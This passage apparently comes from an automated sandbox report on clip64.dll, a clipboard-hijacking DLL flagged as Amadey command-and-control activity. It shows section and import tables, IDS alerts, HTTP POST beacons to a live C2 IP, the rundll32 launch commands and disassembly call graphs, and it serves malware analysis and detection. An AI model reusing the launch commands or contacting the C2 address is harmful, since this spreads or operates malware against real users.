.rsrc | 0x20000 | 0xf8 | 0x200 | 9f59a1f7f3b6dfefbfe8605086b5888e | False | 0.333984375 | data | 2.5080557656497993 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x21000 | 0x1af8 | 0x1c00 | 4b1ffd192b91d9aa86f1e88eeac86ab5 | False | 0.7540457589285714 | data | 6.519144570462316 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x20060 | 0x91 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.8689655172413793
DLL | Import
KERNEL32.dll | GlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
USER32.dll | EmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
WININET.dll | InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle
Name | Ordinal | Address
??4CClipperDLL@@QAEAAV0@$$QAV0@@Z | 1 | 0x10001d60
??4CClipperDLL@@QAEAAV0@ABV0@@Z | 2 | 0x10001d60
Main | 3 | 0x100059a0
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T06:46:41.952354+0100 | 2856151 | ETPRO MALWARE Amadey CnC Activity M7 | 1 | 192.168.2.9 | 49731 | 212.193.31.8 | 80 | TCP
2024-12-23T06:46:44.592932+0100 | 2856151 | ETPRO MALWARE Amadey CnC Activity M7 | 1 | 192.168.2.9 | 49738 | 212.193.31.8 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 06:46:19.956660032 CET | 49731 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:20.076246023 CET | 80 | 49731 | 212.193.31.8 | 192.168.2.9
Dec 23, 2024 06:46:20.076380968 CET | 49731 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:20.079505920 CET | 49731 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:20.200107098 CET | 80 | 49731 | 212.193.31.8 | 192.168.2.9
Dec 23, 2024 06:46:22.569062948 CET | 49738 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:22.688580036 CET | 80 | 49738 | 212.193.31.8 | 192.168.2.9
Dec 23, 2024 06:46:22.688711882 CET | 49738 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:22.689810991 CET | 49738 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:22.809307098 CET | 80 | 49738 | 212.193.31.8 | 192.168.2.9
Dec 23, 2024 06:46:41.952269077 CET | 80 | 49731 | 212.193.31.8 | 192.168.2.9
Dec 23, 2024 06:46:41.952353954 CET | 49731 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:41.952599049 CET | 49731 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:42.072016001 CET | 80 | 49731 | 212.193.31.8 | 192.168.2.9
Dec 23, 2024 06:46:44.592859983 CET | 80 | 49738 | 212.193.31.8 | 192.168.2.9
Dec 23, 2024 06:46:44.592931986 CET | 49738 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:44.594854116 CET | 49738 | 80 | 192.168.2.9 | 212.193.31.8
Dec 23, 2024 06:46:44.714346886 CET | 80 | 49738 | 212.193.31.8 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 06:46:08.168919086 CET | 1.1.1.1 | 192.168.2.9 | 0x2670 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:46:08.168919086 CET | 1.1.1.1 | 192.168.2.9 | 0x2670 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                    • 212.193.31.8
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49731 | 212.193.31.8 | 80 | 7612 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 06:46:20.079505920 CET | 161 | OUT | POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 212.193.31.8
Content-Length: 5
Cache-Control: no-cache
Data Raw: 77 6c 74 3d 31
Data Ascii: wlt=1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49738 | 212.193.31.8 | 80 | 7748 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 06:46:22.689810991 CET | 161 | OUT | POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 212.193.31.8
Content-Length: 5
Cache-Control: no-cache
Data Raw: 77 6c 74 3d 31
Data Ascii: wlt=1


                    Target ID:0
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\System32\loaddll32.exe
                    Wow64 process (32bit):true
                    Commandline:loaddll32.exe "C:\Users\user\Desktop\clip64.dll"
                    Imagebase:0x5b0000
                    File size:126'464 bytes
                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:1
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff70f010000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
                    Imagebase:0xc50000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:00:46:15
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:00:46:18
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\clip64.dll,Main
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:9
                    Start time:00:46:21
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:10
                    Start time:00:46:21
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:11
                    Start time:00:46:21
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                      Execution Graph

                      Execution Coverage:3.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:2.2%
                      Total number of Nodes:1025
                      Total number of Limit Nodes:39
9149 6eb0ef73 9148->9149 9150 6eb0ef94 9148->9150 9182 6eb0b686 9149->9182 9174 6eb0b7d4 EnterCriticalSection 9150->9174 9153 6eb0efa0 9159 6eb0efcc 9153->9159 9175 6eb0eeae 9153->9175 9158 6eb0d3bf 9158->9145 9160 6eb0d233 GetStartupInfoW 9158->9160 9188 6eb0eff3 9159->9188 9161 6eb0d250 9160->9161 9162 6eb0d2e4 9160->9162 9161->9162 9163 6eb0ef5e 26 API calls 9161->9163 9166 6eb0d2e9 9162->9166 9164 6eb0d278 9163->9164 9164->9162 9165 6eb0d2a8 GetFileType 9164->9165 9165->9164 9167 6eb0d2f0 9166->9167 9168 6eb0d333 GetStdHandle 9167->9168 9169 6eb0d399 9167->9169 9170 6eb0d346 GetFileType 9167->9170 9168->9167 9169->9145 9170->9167 9303 6eb0b81c LeaveCriticalSection 9171->9303 9173 6eb0d3df 9173->9131 9174->9153 9191 6eb0b8b2 9175->9191 9177 6eb0eecd 9203 6eb0b90f 9177->9203 9178 6eb0eec0 9178->9177 9198 6eb0d0de 9178->9198 9180 6eb0ef22 9180->9153 9232 6eb0b423 GetLastError 9182->9232 9184 6eb0b68b 9185 6eb099cc 9184->9185 9284 6eb09968 9185->9284 9187 6eb099d8 9187->9158 9302 6eb0b81c LeaveCriticalSection 9188->9302 9190 6eb0effa 9190->9158 9197 6eb0b8bf __dosmaperr 9191->9197 9192 6eb0b8ff 9195 6eb0b686 _free 13 API calls 9192->9195 9193 6eb0b8ea RtlAllocateHeap 9194 6eb0b8fd 9193->9194 9193->9197 9194->9178 9195->9194 9197->9192 9197->9193 9209 6eb09eaa 9197->9209 9218 6eb0cefd 9198->9218 9201 6eb0d118 InitializeCriticalSectionAndSpinCount 9202 6eb0d103 9201->9202 9202->9178 9204 6eb0b91a HeapFree 9203->9204 9208 6eb0b943 _free 9203->9208 9205 6eb0b92f 9204->9205 9204->9208 9206 6eb0b686 _free 12 API calls 9205->9206 9207 6eb0b935 GetLastError 9206->9207 9207->9208 9208->9180 9212 6eb09ed7 9209->9212 9213 6eb09ee3 CallCatchBlock 9212->9213 9214 6eb0b7d4 CallCatchBlock EnterCriticalSection 9213->9214 9215 6eb09eee 9214->9215 9216 6eb09f2a __dosmaperr LeaveCriticalSection 9215->9216 9217 6eb09eb5 9216->9217 9217->9197 9219 6eb0cf27 9218->9219 9220 6eb0cf2b 9218->9220 9219->9201 9219->9202 9220->9219 9225 6eb0ce36 9220->9225 9223 6eb0cf45 GetProcAddress 
9223->9219 9224 6eb0cf55 __dosmaperr 9223->9224 9224->9219 9230 6eb0ce47 ___vcrt_FlsGetValue 9225->9230 9226 6eb0ce65 LoadLibraryExW 9228 6eb0ce80 GetLastError 9226->9228 9226->9230 9227 6eb0cef2 9227->9219 9227->9223 9228->9230 9229 6eb0cedb FreeLibrary 9229->9230 9230->9226 9230->9227 9230->9229 9231 6eb0ceb3 LoadLibraryExW 9230->9231 9231->9230 9233 6eb0b440 9232->9233 9234 6eb0b43a 9232->9234 9254 6eb0b446 SetLastError 9233->9254 9255 6eb0d09c 9233->9255 9260 6eb0d05d 9234->9260 9238 6eb0b8b2 __dosmaperr 12 API calls 9239 6eb0b46e 9238->9239 9241 6eb0b476 9239->9241 9242 6eb0b48d 9239->9242 9243 6eb0d09c __dosmaperr 6 API calls 9241->9243 9244 6eb0d09c __dosmaperr 6 API calls 9242->9244 9245 6eb0b484 9243->9245 9246 6eb0b499 9244->9246 9251 6eb0b90f _free 12 API calls 9245->9251 9247 6eb0b49d 9246->9247 9248 6eb0b4ae 9246->9248 9249 6eb0d09c __dosmaperr 6 API calls 9247->9249 9265 6eb0b0ce 9248->9265 9249->9245 9251->9254 9253 6eb0b90f _free 12 API calls 9253->9254 9254->9184 9256 6eb0cefd __dosmaperr 5 API calls 9255->9256 9257 6eb0d0b8 9256->9257 9258 6eb0b45e 9257->9258 9259 6eb0d0d6 TlsSetValue 9257->9259 9258->9238 9258->9254 9261 6eb0cefd __dosmaperr 5 API calls 9260->9261 9262 6eb0d079 9261->9262 9263 6eb0d082 9262->9263 9264 6eb0d094 TlsGetValue 9262->9264 9263->9233 9270 6eb0af62 9265->9270 9271 6eb0af6e CallCatchBlock 9270->9271 9272 6eb0b7d4 CallCatchBlock EnterCriticalSection 9271->9272 9273 6eb0af78 9272->9273 9274 6eb0afa8 __dosmaperr LeaveCriticalSection 9273->9274 9275 6eb0af96 9274->9275 9276 6eb0b074 9275->9276 9277 6eb0b080 CallCatchBlock 9276->9277 9278 6eb0b7d4 CallCatchBlock EnterCriticalSection 9277->9278 9279 6eb0b08a 9278->9279 9280 6eb0b255 __dosmaperr 14 API calls 9279->9280 9281 6eb0b0a2 9280->9281 9282 6eb0b0c2 __dosmaperr LeaveCriticalSection 9281->9282 9283 6eb0b0b0 9282->9283 9283->9253 9285 6eb0b423 __dosmaperr 14 API calls 9284->9285 9286 6eb09973 9285->9286 9287 6eb09981 9286->9287 9292 6eb099f9 IsProcessorFeaturePresent 
9286->9292 9287->9187 9289 6eb099cb 9290 6eb09968 ___std_exception_copy 25 API calls 9289->9290 9291 6eb099d8 9290->9291 9291->9187 9293 6eb09a05 9292->9293 9296 6eb09820 9293->9296 9297 6eb0983c CallCatchBlock 9296->9297 9298 6eb09868 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9297->9298 9301 6eb09939 CallCatchBlock 9298->9301 9299 6eb06791 __ehhandler$___std_fs_get_file_id@8 5 API calls 9300 6eb09957 GetCurrentProcess TerminateProcess 9299->9300 9300->9289 9301->9299 9302->9190 9303->9173 9305 6eb06984 9304->9305 9306 6eb06988 9304->9306 9305->9045 9307 6eb07288 __DllMainCRTStartup@12 4 API calls 9306->9307 9309 6eb06995 ___scrt_release_startup_lock 9306->9309 9308 6eb069fe 9307->9308 9309->9045 9316 6eb0b2a0 9310->9316 9313 6eb07ba4 9496 6eb07f45 9313->9496 9317 6eb0b2aa 9316->9317 9318 6eb068d3 9316->9318 9319 6eb0d05d __dosmaperr 6 API calls 9317->9319 9318->9313 9320 6eb0b2b1 9319->9320 9320->9318 9321 6eb0d09c __dosmaperr 6 API calls 9320->9321 9322 6eb0b2c4 9321->9322 9324 6eb0b167 9322->9324 9325 6eb0b172 9324->9325 9329 6eb0b182 9324->9329 9330 6eb0b188 9325->9330 9328 6eb0b90f _free 14 API calls 9328->9329 9329->9318 9331 6eb0b1a3 9330->9331 9332 6eb0b19d 9330->9332 9334 6eb0b90f _free 14 API calls 9331->9334 9333 6eb0b90f _free 14 API calls 9332->9333 9333->9331 9335 6eb0b1af 9334->9335 9336 6eb0b90f _free 14 API calls 9335->9336 9337 6eb0b1ba 9336->9337 9338 6eb0b90f _free 14 API calls 9337->9338 9339 6eb0b1c5 9338->9339 9340 6eb0b90f _free 14 API calls 9339->9340 9341 6eb0b1d0 9340->9341 9342 6eb0b90f _free 14 API calls 9341->9342 9343 6eb0b1db 9342->9343 9344 6eb0b90f _free 14 API calls 9343->9344 9345 6eb0b1e6 9344->9345 9346 6eb0b90f _free 14 API calls 9345->9346 9347 6eb0b1f1 9346->9347 9348 6eb0b90f _free 14 API calls 9347->9348 9349 6eb0b1fc 9348->9349 9350 6eb0b90f _free 14 API calls 9349->9350 9351 6eb0b20a 9350->9351 9356 6eb0afb4 9351->9356 9357 6eb0afc0 CallCatchBlock 9356->9357 9372 6eb0b7d4 EnterCriticalSection 
9357->9372 9359 6eb0aff4 9373 6eb0b013 9359->9373 9361 6eb0afca 9361->9359 9363 6eb0b90f _free 14 API calls 9361->9363 9363->9359 9364 6eb0b01f 9365 6eb0b02b CallCatchBlock 9364->9365 9377 6eb0b7d4 EnterCriticalSection 9365->9377 9367 6eb0b035 9378 6eb0b255 9367->9378 9369 6eb0b048 9382 6eb0b068 9369->9382 9372->9361 9376 6eb0b81c LeaveCriticalSection 9373->9376 9375 6eb0b001 9375->9364 9376->9375 9377->9367 9379 6eb0b28b __dosmaperr 9378->9379 9380 6eb0b264 __dosmaperr 9378->9380 9379->9369 9380->9379 9385 6eb0ddf0 9380->9385 9495 6eb0b81c LeaveCriticalSection 9382->9495 9384 6eb0b056 9384->9328 9387 6eb0de70 9385->9387 9389 6eb0de06 9385->9389 9388 6eb0b90f _free 14 API calls 9387->9388 9411 6eb0debe 9387->9411 9390 6eb0de92 9388->9390 9389->9387 9391 6eb0de39 9389->9391 9395 6eb0b90f _free 14 API calls 9389->9395 9392 6eb0b90f _free 14 API calls 9390->9392 9397 6eb0b90f _free 14 API calls 9391->9397 9412 6eb0de5b 9391->9412 9393 6eb0dea5 9392->9393 9396 6eb0b90f _free 14 API calls 9393->9396 9394 6eb0b90f _free 14 API calls 9398 6eb0de65 9394->9398 9400 6eb0de2e 9395->9400 9402 6eb0deb3 9396->9402 9403 6eb0de50 9397->9403 9404 6eb0b90f _free 14 API calls 9398->9404 9399 6eb0df2c 9405 6eb0b90f _free 14 API calls 9399->9405 9413 6eb0e230 9400->9413 9401 6eb0decc 9401->9399 9409 6eb0b90f 14 API calls _free 9401->9409 9407 6eb0b90f _free 14 API calls 9402->9407 9441 6eb0e32e 9403->9441 9404->9387 9410 6eb0df32 9405->9410 9407->9411 9409->9401 9410->9379 9453 6eb0df61 9411->9453 9412->9394 9414 6eb0e241 9413->9414 9440 6eb0e32a 9413->9440 9415 6eb0e252 9414->9415 9417 6eb0b90f _free 14 API calls 9414->9417 9416 6eb0e264 9415->9416 9418 6eb0b90f _free 14 API calls 9415->9418 9419 6eb0e276 9416->9419 9420 6eb0b90f _free 14 API calls 9416->9420 9417->9415 9418->9416 9421 6eb0e288 9419->9421 9422 6eb0b90f _free 14 API calls 9419->9422 9420->9419 9423 6eb0e29a 9421->9423 9425 6eb0b90f _free 14 API calls 9421->9425 9422->9421 9424 6eb0e2ac 9423->9424 9426 6eb0b90f _free 14 
API calls 9423->9426 9427 6eb0e2be 9424->9427 9428 6eb0b90f _free 14 API calls 9424->9428 9425->9423 9426->9424 9429 6eb0e2d0 9427->9429 9430 6eb0b90f _free 14 API calls 9427->9430 9428->9427 9431 6eb0e2e2 9429->9431 9433 6eb0b90f _free 14 API calls 9429->9433 9430->9429 9432 6eb0e2f4 9431->9432 9434 6eb0b90f _free 14 API calls 9431->9434 9435 6eb0b90f _free 14 API calls 9432->9435 9437 6eb0e306 9432->9437 9433->9431 9434->9432 9435->9437 9436 6eb0e318 9439 6eb0b90f _free 14 API calls 9436->9439 9436->9440 9437->9436 9438 6eb0b90f _free 14 API calls 9437->9438 9438->9436 9439->9440 9440->9391 9442 6eb0e33b 9441->9442 9452 6eb0e393 9441->9452 9443 6eb0b90f _free 14 API calls 9442->9443 9444 6eb0e34b 9442->9444 9443->9444 9445 6eb0e35d 9444->9445 9446 6eb0b90f _free 14 API calls 9444->9446 9447 6eb0e36f 9445->9447 9448 6eb0b90f _free 14 API calls 9445->9448 9446->9445 9449 6eb0e381 9447->9449 9450 6eb0b90f _free 14 API calls 9447->9450 9448->9447 9451 6eb0b90f _free 14 API calls 9449->9451 9449->9452 9450->9449 9451->9452 9452->9412 9454 6eb0df6e 9453->9454 9458 6eb0df8d 9453->9458 9454->9458 9459 6eb0e3cf 9454->9459 9457 6eb0b90f _free 14 API calls 9457->9458 9458->9401 9460 6eb0df87 9459->9460 9461 6eb0e3e0 9459->9461 9460->9457 9462 6eb0e397 __dosmaperr 14 API calls 9461->9462 9463 6eb0e3e8 9462->9463 9464 6eb0e397 __dosmaperr 14 API calls 9463->9464 9465 6eb0e3f3 9464->9465 9466 6eb0e397 __dosmaperr 14 API calls 9465->9466 9467 6eb0e3fe 9466->9467 9468 6eb0e397 __dosmaperr 14 API calls 9467->9468 9469 6eb0e409 9468->9469 9470 6eb0e397 __dosmaperr 14 API calls 9469->9470 9471 6eb0e417 9470->9471 9472 6eb0b90f _free 14 API calls 9471->9472 9473 6eb0e422 9472->9473 9474 6eb0b90f _free 14 API calls 9473->9474 9475 6eb0e42d 9474->9475 9476 6eb0b90f _free 14 API calls 9475->9476 9477 6eb0e438 9476->9477 9478 6eb0e397 __dosmaperr 14 API calls 9477->9478 9479 6eb0e446 9478->9479 9480 6eb0e397 __dosmaperr 14 API calls 9479->9480 9481 6eb0e454 9480->9481 9482 6eb0e397 
__dosmaperr 14 API calls 9481->9482 9483 6eb0e465 9482->9483 9484 6eb0e397 __dosmaperr 14 API calls 9483->9484 9485 6eb0e473 9484->9485 9486 6eb0e397 __dosmaperr 14 API calls 9485->9486 9487 6eb0e481 9486->9487 9488 6eb0b90f _free 14 API calls 9487->9488 9489 6eb0e48c 9488->9489 9490 6eb0b90f _free 14 API calls 9489->9490 9491 6eb0e497 9490->9491 9492 6eb0b90f _free 14 API calls 9491->9492 9493 6eb0e4a2 9492->9493 9494 6eb0b90f _free 14 API calls 9493->9494 9494->9460 9495->9384 9497 6eb07f52 9496->9497 9503 6eb068d8 9496->9503 9498 6eb07f60 9497->9498 9504 6eb09150 9497->9504 9500 6eb0918b ___vcrt_FlsSetValue 6 API calls 9498->9500 9501 6eb07f70 9500->9501 9509 6eb07f29 9501->9509 9503->8981 9505 6eb09091 ___vcrt_FlsGetValue 5 API calls 9504->9505 9506 6eb0916a 9505->9506 9507 6eb09182 TlsGetValue 9506->9507 9508 6eb09176 9506->9508 9507->9508 9508->9498 9510 6eb07f40 9509->9510 9511 6eb07f33 9509->9511 9510->9503 9511->9510 9513 6eb0ada7 9511->9513 9514 6eb0b90f _free 14 API calls 9513->9514 9515 6eb0adbf 9514->9515 9515->9510 9522 6eb07f89 9516->9522 9518 6eb068b4 9518->9008 9519 6eb0acdf 9518->9519 9520 6eb0b423 __dosmaperr 14 API calls 9519->9520 9521 6eb068c0 9520->9521 9521->9006 9521->9007 9523 6eb07f92 9522->9523 9524 6eb07f95 GetLastError 9522->9524 9523->9518 9525 6eb09150 ___vcrt_FlsGetValue 6 API calls 9524->9525 9526 6eb07faa 9525->9526 9527 6eb07fc9 9526->9527 9528 6eb0800f SetLastError 9526->9528 9529 6eb0918b ___vcrt_FlsSetValue 6 API calls 9526->9529 9527->9528 9528->9518 9530 6eb07fc3 CallCatchBlock 9529->9530 9530->9527 9531 6eb07feb 9530->9531 9532 6eb0918b ___vcrt_FlsSetValue 6 API calls 9530->9532 9533 6eb0918b ___vcrt_FlsSetValue 6 API calls 9531->9533 9534 6eb07fff 9531->9534 9532->9531 9533->9534 9535 6eb0ada7 ___std_exception_copy 14 API calls 9534->9535 9535->9527 9537 6eb06914 ___scrt_release_startup_lock 9536->9537 9538 6eb06918 9537->9538 9542 6eb06924 __DllMainCRTStartup@12 9537->9542 9557 6eb0ab46 9538->9557 9541 6eb06931 9541->9015 
9542->9541 9560 6eb0a1f0 9542->9560 9627 6eb07f06 InterlockedFlushSList 9545->9627 9549 6eb06abc 9548->9549 9553 6eb06ad2 9549->9553 9631 6eb0acf2 9549->9631 9551 6eb06aca 9552 6eb07baf ___scrt_uninitialize_crt 7 API calls 9551->9552 9552->9553 9554 6eb06f1c 9553->9554 9741 6eb06932 9554->9741 9571 6eb0a858 9557->9571 9561 6eb0a20f 9560->9561 9562 6eb0a1fe 9560->9562 9595 6eb0a0b6 9561->9595 9588 6eb0a296 GetModuleHandleW 9562->9588 9567 6eb0a249 9567->9015 9572 6eb0a864 CallCatchBlock 9571->9572 9579 6eb0b7d4 EnterCriticalSection 9572->9579 9574 6eb0a872 9580 6eb0aa56 9574->9580 9579->9574 9581 6eb0a87f 9580->9581 9582 6eb0aa75 9580->9582 9584 6eb0a8a7 9581->9584 9582->9581 9583 6eb0b90f _free 14 API calls 9582->9583 9583->9581 9587 6eb0b81c LeaveCriticalSection 9584->9587 9586 6eb06922 9586->9015 9587->9586 9589 6eb0a203 9588->9589 9589->9561 9590 6eb0a2d9 GetModuleHandleExW 9589->9590 9591 6eb0a2f8 GetProcAddress 9590->9591 9592 6eb0a30d 9590->9592 9591->9592 9593 6eb0a321 FreeLibrary 9592->9593 9594 6eb0a32a 9592->9594 9593->9594 9594->9561 9596 6eb0a0c2 CallCatchBlock 9595->9596 9611 6eb0b7d4 EnterCriticalSection 9596->9611 9598 6eb0a0cc 9612 6eb0a103 9598->9612 9600 6eb0a0d9 9616 6eb0a0f7 9600->9616 9603 6eb0a254 9620 6eb0b881 GetPEB 9603->9620 9606 6eb0a283 9609 6eb0a2d9 CallCatchBlock 3 API calls 9606->9609 9607 6eb0a263 GetPEB 9607->9606 9608 6eb0a273 GetCurrentProcess TerminateProcess 9607->9608 9608->9606 9610 6eb0a28b ExitProcess 9609->9610 9611->9598 9613 6eb0a10f CallCatchBlock 9612->9613 9614 6eb0a170 CallCatchBlock 9613->9614 9615 6eb0ab46 __DllMainCRTStartup@12 14 API calls 9613->9615 9614->9600 9615->9614 9619 6eb0b81c LeaveCriticalSection 9616->9619 9618 6eb0a0e5 9618->9567 9618->9603 9619->9618 9621 6eb0a25e 9620->9621 9622 6eb0b89b 9620->9622 9621->9606 9621->9607 9624 6eb0cf80 9622->9624 9625 6eb0cefd __dosmaperr 5 API calls 9624->9625 9626 6eb0cf9c 9625->9626 9626->9621 9628 6eb07f16 9627->9628 9629 6eb074a6 9627->9629 9628->9629 9630 
6eb0ada7 ___std_exception_copy 14 API calls 9628->9630 9629->9017 9630->9628 9632 6eb0acfd 9631->9632 9633 6eb0ad0f ___scrt_uninitialize_crt 9631->9633 9634 6eb0ad0b 9632->9634 9636 6eb0daab 9632->9636 9633->9551 9634->9551 9639 6eb0d959 9636->9639 9642 6eb0d8ad 9639->9642 9643 6eb0d8b9 CallCatchBlock 9642->9643 9650 6eb0b7d4 EnterCriticalSection 9643->9650 9645 6eb0d8c3 ___scrt_uninitialize_crt 9646 6eb0d92f 9645->9646 9651 6eb0d821 9645->9651 9659 6eb0d94d 9646->9659 9650->9645 9652 6eb0d82d CallCatchBlock 9651->9652 9662 6eb0dbc8 EnterCriticalSection 9652->9662 9654 6eb0d837 ___scrt_uninitialize_crt 9658 6eb0d870 9654->9658 9663 6eb0da63 9654->9663 9673 6eb0d8a1 9658->9673 9740 6eb0b81c LeaveCriticalSection 9659->9740 9661 6eb0d93b 9661->9634 9662->9654 9664 6eb0da70 9663->9664 9665 6eb0da79 9663->9665 9667 6eb0d959 ___scrt_uninitialize_crt 66 API calls 9664->9667 9676 6eb0d9fe 9665->9676 9672 6eb0da76 9667->9672 